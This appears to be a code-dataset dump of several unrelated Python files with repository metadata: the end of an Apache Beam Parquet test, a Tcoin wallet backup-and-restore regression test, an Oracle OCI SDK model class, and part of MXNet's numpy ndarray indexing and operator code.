| 'reshuffle' >> Reshuffle()
| 'cleanup' >> Map(lambda x: FileSystems.delete([x])))
def _generate_data(self, p, output_prefix, init_size, data_size):
init_data = [x for x in range(init_size)]
lines = (
p
| 'create' >> Create(init_data)
| 'produce' >> ParDo(ProducerFn(data_size)))
schema = pa.schema([('name', pa.binary()), ('number', pa.int64())])
files = lines | 'write' >> WriteToParquet(
output_prefix, schema, codec='snappy', file_name_suffix='.parquet')
return files
class ProducerFn(DoFn):
def __init__(self, number):
super().__init__()
self._number = number
self._string_index = 0
self._number_index = 0
def process(self, element):
self._string_index = 0
self._number_index = 0
for _ in range(self._number):
yield {'name': self.get_string(4), 'number': self.get_int()}
def get_string(self, length):
s = []
for _ in range(length):
s.append(string.ascii_uppercase[self._string_index])
self._string_index = (self._string_index + 1) % 26
return ''.join(s)
def get_int(self):
i = self._number_index
self._number_index = self._number_index + 1
return i
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| 31.574324
| 80
| 0.691633
|
000714198c8e28c4bff3929e8b25b0b4271c074a
| 7,298
|
py
|
Python
|
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | 2
|
2018-06-24T19:51:25.000Z
|
2019-06-11T14:00:16.000Z
|
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | 2
|
2018-09-13T22:54:32.000Z
|
2019-02-20T02:04:25.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Tcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Exercise the wallet backup code. Ported from walletbackup.sh.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from test_framework.test_framework import TcoinTestFramework
from test_framework.util import *
from random import randint
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO, stream=sys.stdout)
class WalletBackupTest(TcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
        # nodes 1, 2, 3 are spenders, let's give them a keypool=100
self.extra_args = [["-keypool=100"], ["-keypool=100"], ["-keypool=100"], []]
# This mirrors how the network was setup in the bash test
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, self.extra_args)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
self.is_network_split=False
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
sync_mempools(self.nodes)
self.nodes[3].generate(1)
sync_blocks(self.nodes)
# As above, this mirrors the original bash test.
def start_three(self):
self.nodes[0] = start_node(0, self.options.tmpdir)
self.nodes[1] = start_node(1, self.options.tmpdir)
self.nodes[2] = start_node(2, self.options.tmpdir)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
def stop_three(self):
stop_node(self.nodes[0], 0)
stop_node(self.nodes[1], 1)
stop_node(self.nodes[2], 2)
def erase_three(self):
os.remove(self.options.tmpdir + "/node0/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node2/regtest/wallet.dat")
def run_test(self):
logging.info("Generating initial blockchain")
self.nodes[0].generate(1)
sync_blocks(self.nodes)
self.nodes[1].generate(1)
sync_blocks(self.nodes)
self.nodes[2].generate(1)
sync_blocks(self.nodes)
self.nodes[3].generate(100)
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
logging.info("Creating transactions")
# Five rounds of sending each other transactions.
for i in range(5):
self.do_one_round()
logging.info("Backing up")
tmpdir = self.options.tmpdir
self.nodes[0].backupwallet(tmpdir + "/node0/wallet.bak")
self.nodes[0].dumpwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].backupwallet(tmpdir + "/node1/wallet.bak")
self.nodes[1].dumpwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].backupwallet(tmpdir + "/node2/wallet.bak")
self.nodes[2].dumpwallet(tmpdir + "/node2/wallet.dump")
logging.info("More transactions")
for i in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
logging.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
# Restore wallets from backup
shutil.copyfile(tmpdir + "/node0/wallet.bak", tmpdir + "/node0/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node1/wallet.bak", tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node2/wallet.bak", tmpdir + "/node2/regtest/wallet.dat")
logging.info("Re-starting nodes")
self.start_three()
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
logging.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
self.start_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].importwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].importwallet(tmpdir + "/node2/wallet.dump")
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if __name__ == '__main__':
WalletBackupTest().main()
| 35.950739
| 95
| 0.653193
|
6bd64497e387e43a4da3be2dbb6229b5ba9400e8
| 2,453
|
py
|
Python
|
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ChangeVlanCompartmentDetails(object):
"""
The configuration details for the move operation.
"""
def __init__(self, **kwargs):
"""
Initializes a new ChangeVlanCompartmentDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this ChangeVlanCompartmentDetails.
:type compartment_id: str
"""
self.swagger_types = {
'compartment_id': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId'
}
self._compartment_id = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this ChangeVlanCompartmentDetails.
The `OCID`__ of the compartment to move the VLAN to.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this ChangeVlanCompartmentDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this ChangeVlanCompartmentDetails.
The `OCID`__ of the compartment to move the VLAN to.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this ChangeVlanCompartmentDetails.
:type: str
"""
self._compartment_id = compartment_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
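# Minimal usage sketch (illustrative; the compartment OCID below is a made-up
# placeholder):
#
#     details = ChangeVlanCompartmentDetails(
#         compartment_id="ocid1.compartment.oc1..exampleuniqueid")
#     print(details.compartment_id)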
| 32.706667
| 245
| 0.68406
|
52dc9fb7a6852b0a667308db9c0d69875a62f564
| 148,758
|
py
|
Python
|
python/mxnet/numpy/multiarray.py
|
jonatanmil/incubator-mxnet
|
6af6570b065e1d4886621763777297eedb2fde84
|
[
"Apache-2.0"
] | null | null | null |
python/mxnet/numpy/multiarray.py
|
jonatanmil/incubator-mxnet
|
6af6570b065e1d4886621763777297eedb2fde84
|
[
"Apache-2.0"
] | 1
|
2021-12-10T01:33:49.000Z
|
2021-12-10T01:33:49.000Z
|
python/mxnet/numpy/multiarray.py
|
junhalba/incubator-mxnet-master
|
be7296bcaa104e333ac68e27d78576ceedc78d1f
|
[
"BSL-1.0",
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines, unused-argument
"""numpy ndarray and util functions."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
except ImportError:
from builtins import slice as py_slice
from array import array as native_array
import sys
import ctypes
import warnings
import numpy as _np
from ..ndarray import NDArray, _DTYPE_NP_TO_MX, _GRAD_REQ_MAP
from ..ndarray import indexing_key_expand_implicit_axes, get_indexing_dispatch_code,\
get_oshape_of_gather_nd_op
from ..ndarray._internal import _set_np_ndarray_class
from . import _op as _mx_np_op
from ..base import check_call, _LIB, NDArrayHandle
from ..base import mx_real_t, c_array_buf, mx_uint, numeric_types, integer_types
from ..context import Context
from ..util import _sanity_check_params, set_module
from ..context import current_context
from ..ndarray import numpy as _mx_nd_np
from ..ndarray.numpy import _internal as _npi
__all__ = ['ndarray', 'empty', 'array', 'zeros', 'ones', 'full', 'add', 'subtract', 'multiply', 'divide',
'mod', 'remainder', 'power', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt',
'abs', 'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log',
'degrees', 'log2', 'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative',
'fix', 'ceil', 'floor', 'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh',
'tensordot', 'linspace', 'expand_dims', 'tile', 'arange', 'split', 'concatenate',
'stack', 'mean', 'maximum', 'minimum', 'swapaxes', 'clip', 'argmax', 'std', 'var', 'indices', 'copysign',
'ravel']
# Return code for dispatching indexing function call
_NDARRAY_UNSUPPORTED_INDEXING = -1
_NDARRAY_BASIC_INDEXING = 0
_NDARRAY_ADVANCED_INDEXING = 1
# This function is copied from ndarray.py since pylint
# keeps giving false alarm error of undefined-all-variable
def _new_alloc_handle(shape, ctx, delay_alloc, dtype=mx_real_t):
"""Return a new handle with specified shape and context.
Empty handle is only used to hold results.
Returns
-------
handle
A new empty `ndarray` handle.
"""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayCreateEx(
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[_np.dtype(dtype).type])),
ctypes.byref(hdl)))
return hdl
# Have to use 0 as default value for stype since pylint does not allow
# importing _STORAGE_TYPE_DEFAULT from ndarray.py.
def _np_ndarray_cls(handle, writable=True, stype=0):
if stype != 0:
raise ValueError('_np_ndarray_cls currently only supports default storage '
'type, while received stype = {}'.format(stype))
return ndarray(handle, writable=writable)
_set_np_ndarray_class(_np_ndarray_cls)
def _get_index(idx):
if isinstance(idx, NDArray) and not isinstance(idx, ndarray):
raise TypeError('Cannot have mx.nd.NDArray as index')
if isinstance(idx, ndarray):
return idx.as_nd_ndarray()
elif sys.version_info[0] > 2 and isinstance(idx, range):
return array(_np.arange(idx.start, idx.stop, idx.step, dtype=_np.int32)).as_nd_ndarray()
else:
return idx
_NUMPY_ARRAY_FUNCTION_DICT = {}
_NUMPY_ARRAY_UFUNC_DICT = {}
@set_module('mxnet.numpy') # pylint: disable=invalid-name
class ndarray(NDArray):
"""
An array object represents a multidimensional, homogeneous array of fixed-size items.
An associated data-type object describes the format of each element in the array
(its byte-order, how many bytes it occupies in memory, whether it is an integer, a
floating point number, or something else, etc.). Arrays should be constructed using
`array`, `zeros` or `empty`. Currently, only c-contiguous arrays are supported.
"""
@staticmethod
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs): # pylint: disable=bad-staticmethod-argument
"""
Dispatch official NumPy unary/binary operator calls on mxnet.numpy.ndarray
to this function. The operators must comply with the ufunc definition in NumPy.
The following code is adapted from CuPy.
"""
if 'out' in kwargs:
# need to unfold tuple argument in kwargs
out = kwargs['out']
if len(out) != 1:
raise ValueError('The `out` parameter must have exactly one ndarray')
kwargs['out'] = out[0]
if method == '__call__':
if ufunc.signature is not None:
# we don't support generalised-ufuncs (gufuncs)
return NotImplemented
name = ufunc.__name__
mx_ufunc = _NUMPY_ARRAY_UFUNC_DICT.get(name, None)
if mx_ufunc is None:
raise ValueError('mxnet.numpy operator `{}` has not been registered in '
'the _NUMPY_ARRAY_UFUNC_LIST. Please make sure you are '
'using NumPy >= 1.15.0 and the operator implementation '
'is compatible with NumPy. Then add the operator name '
'to the list.'
.format(name))
return mx_ufunc(*inputs, **kwargs)
else:
return NotImplemented
@staticmethod
def __array_function__(self, func, types, args, kwargs): # pylint: disable=bad-staticmethod-argument
"""
Dispatch official NumPy operators that comply with the array function protocol to
this function.
"""
mx_np_func = _NUMPY_ARRAY_FUNCTION_DICT.get(func, None)
if mx_np_func is None:
raise ValueError('mxnet.numpy operator `{}` has not been registered in '
'the _NUMPY_ARRAY_FUNCTION_LIST. Please make sure you are '
'using NumPy >= 1.17.0 and the operator '
'implementation is compatible with NumPy. Then add '
'the operator name to the list.'.format(func))
# Note: this allows subclasses that don't override
# __array_function__ to handle mxnet.numpy.ndarray objects
if not all(issubclass(t, ndarray) for t in types):
return NotImplemented
return mx_np_func(*args, **kwargs)
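    # Illustrative sketch (added commentary, not part of the original source): when the
    # registration lists maintained elsewhere in the package are populated, calling an
    # official NumPy operator on mxnet.numpy.ndarray inputs is redirected to the MXNet
    # implementation via the two protocols above. Assuming `add` and `mean` are registered,
    # a session might look like:
    #   >>> import numpy as onp
    #   >>> from mxnet import numpy as np
    #   >>> a, b = np.ones((2, 3)), np.ones((2, 3))
    #   >>> onp.add(a, b)     # dispatched through __array_ufunc__
    #   >>> onp.mean(a)       # dispatched through __array_function__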
def _get_np_basic_indexing(self, key):
"""
This function indexes ``self`` with a tuple of `slice` objects only.
"""
key_nd = tuple(idx for idx in key if idx is not None)
if len(key_nd) < self.ndim:
raise RuntimeError(
'too few indices after normalization: expected `ndim` ({}) '
'but got {}. This is a bug, please report it!'
''.format(self.ndim, len(key_nd))
)
if len(key_nd) > self.ndim:
raise IndexError(
'too many indices ({}) for array with {} dimensions'
''.format(len(key_nd), self.ndim)
)
none_axes = [ax for ax in range(len(key)) if key[ax] is None] # pylint: disable=invalid-name
slc_key, int_axes = self._basic_indexing_key_int_to_slice(key_nd)
new_axes = self._new_axes_after_basic_indexing(none_axes, key)
# Check bounds for integer axes
for ax in int_axes: # pylint: disable=invalid-name
if not -self.shape[ax] <= key_nd[ax] < self.shape[ax]:
raise IndexError(
'index {} is out of bounds for axis {} with size {}'
''.format(key_nd[ax], ax, self.shape[ax]))
if self._basic_indexing_slice_is_contiguous(slc_key, self.shape):
# Create a shared-memory view by using low-level flat slicing
flat_begin, flat_end = self._basic_indexing_contiguous_flat_begin_end(
slc_key, self.shape
)
handle = NDArrayHandle()
flat_self = self.reshape_view(-1)
check_call(
_LIB.MXNDArraySlice(
flat_self.handle,
mx_uint(flat_begin),
mx_uint(flat_end),
ctypes.byref(handle),
)
)
sliced_shape = self._basic_indexing_sliced_shape(slc_key, self.shape)
sliced = self.__class__(handle=handle, writable=self.writable)
if 0 in sliced_shape:
sliced = sliced.reshape(sliced_shape)
else:
sliced = sliced.reshape_view(sliced_shape)
else:
begin, end, step = self._basic_indexing_key_to_begin_end_step(
slc_key, self.shape, keep_none=True
)
sliced = _npi.slice(self, begin, end, step)
# Reshape to final shape due to integer and `None` entries in `key`.
final_shape = [sliced.shape[i] for i in range(sliced.ndim) if i not in int_axes]
for ax in new_axes: # pylint: disable=invalid-name
final_shape.insert(ax, 1)
if sliced.size == 0:
return sliced.reshape(tuple(final_shape))
else:
return sliced.reshape_view(tuple(final_shape))
def _get_np_advanced_indexing(self, key):
idcs, new_axes = self._get_index_nd(key)
if type(idcs) == NDArray: # pylint: disable=unidiomatic-typecheck
idcs = idcs.as_np_ndarray()
else:
idcs = _npi.stack(*[i if isinstance(i, self.__class__) else i.as_np_ndarray() for i in idcs])
sliced = _npi.gather_nd(self, idcs)
# Reshape due to `None` entries in `key`.
if new_axes:
final_shape = [sliced.shape[i] for i in range(sliced.ndim)]
for ax in new_axes: # pylint: disable=invalid-name
final_shape.insert(ax, 1)
return sliced.reshape(tuple(final_shape))
else:
return sliced
def _set_np_advanced_indexing(self, key, value):
"""This function is called by __setitem__ when key is an advanced index."""
idcs, new_axes = self._get_index_nd(key)
if type(idcs) == NDArray: # pylint: disable=unidiomatic-typecheck
idcs = idcs.as_np_ndarray()
else:
idcs = _npi.stack(*[i if isinstance(i, self.__class__) else i.as_np_ndarray() for i in idcs])
vshape = get_oshape_of_gather_nd_op(self.shape, idcs.shape)
value_nd = self._prepare_value_nd(value, bcast_shape=vshape, squeeze_axes=new_axes)
self._scatter_set_nd(value_nd, idcs)
# pylint: disable=too-many-return-statements
def __getitem__(self, key):
"""
        Overrides the indexing behavior of the NDArray class with NumPy-style semantics.
        Dispatches to _get_np_basic_indexing(key) or _get_np_advanced_indexing(key) depending on the key.
"""
ndim = self.ndim
shape = self.shape
if ndim == 0:
if key != ():
raise IndexError('scalar tensor can only accept `()` as index')
# Handle simple cases for higher speed
if isinstance(key, tuple) and len(key) == 0:
return self
if isinstance(key, tuple) and len(key) == ndim\
and all(isinstance(idx, integer_types) for idx in key):
out = self
for idx in key:
out = out[idx]
return out
if isinstance(key, integer_types):
if key > shape[0] - 1:
raise IndexError(
'index {} is out of bounds for axis 0 with size {}'.format(
key, shape[0]))
return self._at(key)
elif isinstance(key, py_slice):
if key.step is None or key.step == 1:
if key.start is not None or key.stop is not None:
return self._slice(key.start, key.stop)
else:
return self
elif key.step == 0:
raise ValueError("slice step cannot be zero")
key = indexing_key_expand_implicit_axes(key, self.shape)
indexing_dispatch_code = get_indexing_dispatch_code(key)
if indexing_dispatch_code == _NDARRAY_BASIC_INDEXING:
return self._get_np_basic_indexing(key)
elif indexing_dispatch_code == _NDARRAY_ADVANCED_INDEXING:
return self._get_np_advanced_indexing(key)
else:
raise RuntimeError
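    # Illustrative sketch (added commentary, not part of the original source) of the two
    # indexing paths above; outputs are assumed to follow official NumPy semantics:
    #   >>> a = array([[1., 2., 3.], [4., 5., 6.]])
    #   >>> a[0, 1:]             # slice/integer key -> basic indexing
    #   array([2., 3.])
    #   >>> a[[0, 1], [2, 0]]    # integer-array key -> advanced indexing (gather_nd)
    #   array([3., 4.])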
def __setitem__(self, key, value):
"""
x.__setitem__(i, y) <=> x[i]=y
Sets ``self[key]`` to ``value``.
Overriding the method in NDArray class in a numpy fashion.
"""
if isinstance(value, NDArray) and not isinstance(value, ndarray):
raise TypeError('Cannot assign mx.nd.NDArray to mxnet.numpy.ndarray')
if self.ndim == 0:
if not isinstance(key, tuple) or len(key) != 0:
raise IndexError('scalar tensor can only accept `()` as index')
if isinstance(value, numeric_types):
                self._full(value)
elif isinstance(value, ndarray) and value.size == 1:
if value.shape != self.shape:
value = value.reshape(self.shape)
value.copyto(self)
elif isinstance(value, (_np.ndarray, _np.generic)) and value.size == 1:
if isinstance(value, _np.generic) or value.shape != self.shape:
value = value.reshape(self.shape)
self._sync_copyfrom(value)
else:
raise ValueError('setting an array element with a sequence.')
else:
key = indexing_key_expand_implicit_axes(key, self.shape)
slc_key = tuple(idx for idx in key if idx is not None)
if len(slc_key) < self.ndim:
raise RuntimeError(
'too few indices after normalization: expected `ndim` ({}) '
'but got {}. This is a bug, please report it!'
''.format(self.ndim, len(slc_key))
)
if len(slc_key) > self.ndim and self.ndim != 0:
raise IndexError(
'too many indices ({}) for array with {} dimensions'
''.format(len(slc_key), self.ndim)
)
indexing_dispatch_code = get_indexing_dispatch_code(slc_key)
if indexing_dispatch_code == _NDARRAY_BASIC_INDEXING:
                self._set_nd_basic_indexing(key, value)  # this method is inherited from the NDArray class
elif indexing_dispatch_code == _NDARRAY_ADVANCED_INDEXING:
self._set_np_advanced_indexing(key, value)
else:
raise ValueError(
'Indexing NDArray with index {} of type {} is not supported'
''.format(key, type(key))
)
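    # Illustrative sketch (added commentary, not part of the original source): a
    # basic-indexing key routes the assignment through _set_nd_basic_indexing, while an
    # integer-array key routes it through _set_np_advanced_indexing (a scatter), e.g.:
    #   >>> a = zeros((2, 3))
    #   >>> a[0, :] = 1.0              # basic indexing path
    #   >>> a[[0, 1], [2, 0]] = 5.0    # advanced indexing (scatter) path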
def _prepare_value_nd(self, value, bcast_shape, squeeze_axes=None):
"""Return a broadcast `ndarray` with same context and dtype as ``self``.
        For item assignment, the returned `ndarray` is squeezed according to squeeze_axes, since
        value_nd is assigned to space that has not yet been expanded in the original array.
        `value`: numeric types or array like.
        `bcast_shape`: a shape tuple.
        `squeeze_axes`: a sequence of axes to squeeze in the value array.
        Note: mxnet.numpy.ndarray does not support NDArray as an assigned value.
"""
if isinstance(value, numeric_types):
value_nd = full(bcast_shape, value, ctx=self.ctx, dtype=self.dtype)
elif isinstance(value, self.__class__):
value_nd = value.as_in_ctx(self.ctx)
if value_nd.dtype != self.dtype:
value_nd = value_nd.astype(self.dtype)
else:
try:
value_nd = array(value, ctx=self.ctx, dtype=self.dtype)
except:
raise TypeError('mxnet.np.ndarray does not support assignment with non-array-like '
'object {} of type {}'.format(value, type(value)))
# For advanced indexing setitem, if there is None in indices, we need to squeeze the
# assigned value_nd since None is also ignored in slicing the original array.
if squeeze_axes and value_nd.ndim > len(bcast_shape):
squeeze_axes = tuple([ax for ax in squeeze_axes if ax < len(value_nd.shape)])
value_nd = value_nd.squeeze(axis=tuple(squeeze_axes))
# handle the cases like the following
# a = np.zeros((3, 3)), b = np.ones((1, 1, 1, 1, 3)), a[0] = b
# b cannot broadcast directly to a[0].shape unless its leading 1-size axes are trimmed
if value_nd.ndim > len(bcast_shape):
squeeze_axes = []
for i in range(value_nd.ndim - len(bcast_shape)):
if value_nd.shape[i] == 1:
squeeze_axes.append(i)
else:
break
if squeeze_axes:
value_nd = value_nd.squeeze(squeeze_axes)
if value_nd.shape != bcast_shape:
if value_nd.size == 0:
value_nd = value_nd.reshape(bcast_shape)
else:
value_nd = value_nd.broadcast_to(bcast_shape)
return value_nd
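    # Illustrative sketch (added commentary, not part of the original source) of the
    # leading-1-axis trimming described in the comments above: assigning a value of shape
    # (1, 1, 1, 1, 3) into a row of shape (3,) first strips the extra size-1 axes so the
    # value can broadcast:
    #   >>> a = zeros((3, 3))
    #   >>> b = ones((1, 1, 1, 1, 3))
    #   >>> a[0] = b   # b is squeezed to shape (3,) before broadcasting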
def __add__(self, other):
"""x.__add__(y) <=> x + y"""
return add(self, other)
def __iadd__(self, other):
"""x.__iadd__(y) <=> x += y"""
if not self.writable:
raise ValueError('trying to add to a readonly ndarray')
return add(self, other, out=self)
def __sub__(self, other):
"""x.__sub__(y) <=> x - y"""
return subtract(self, other)
def __isub__(self, other):
"""x.__isub__(y) <=> x -= y"""
if not self.writable:
raise ValueError('trying to subtract from a readonly ndarray')
return subtract(self, other, out=self)
def __rsub__(self, other):
"""x.__rsub__(y) <=> y - x"""
return subtract(other, self)
def __mul__(self, other):
"""x.__mul__(y) <=> x * y"""
return multiply(self, other)
def __neg__(self):
return self.__mul__(-1.0)
def __imul__(self, other):
"""x.__imul__(y) <=> x *= y"""
if not self.writable:
            raise ValueError('trying to multiply a readonly ndarray')
return multiply(self, other, out=self)
def __rmul__(self, other):
"""x.__rmul__(y) <=> y * x"""
return self.__mul__(other)
def __div__(self, other):
raise AttributeError('ndarray.__div__ is replaced by __truediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __rdiv__(self, other):
raise AttributeError('ndarray.__rdiv__ is replaced by __rtruediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __idiv__(self, other):
        raise AttributeError('ndarray.__idiv__ is replaced by __itruediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __truediv__(self, other):
"""x.__truediv__(y) <=> x / y"""
return divide(self, other)
def __rtruediv__(self, other):
"""x.__rtruediv__(y) <=> y / x"""
return divide(other, self)
def __itruediv__(self, other):
return divide(self, other, out=self)
def __mod__(self, other):
"""x.__mod__(y) <=> x % y"""
return mod(self, other)
def __rmod__(self, other):
"""x.__rmod__(y) <=> y % x"""
return mod(other, self)
def __imod__(self, other):
"""x.__imod__(y) <=> x %= y"""
return mod(self, other, out=self)
def __pow__(self, other):
"""x.__pow__(y) <=> x ** y"""
return power(self, other)
def __rpow__(self, other):
"""x.__rpow__(y) <=> y ** x"""
return power(other, self)
def __eq__(self, other):
"""x.__eq__(y) <=> x == y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.equal(self, other)
elif isinstance(other, numeric_types):
return _npi.equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __hash__(self):
raise NotImplementedError
def __ne__(self, other):
"""x.__ne__(y) <=> x != y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.not_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.not_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __gt__(self, other):
"""x.__gt__(y) <=> x > y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.greater(self, other)
elif isinstance(other, numeric_types):
return _npi.greater_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __ge__(self, other):
"""x.__ge__(y) <=> x >= y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.greater_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.greater_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __lt__(self, other):
"""x.__lt__(y) <=> x < y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
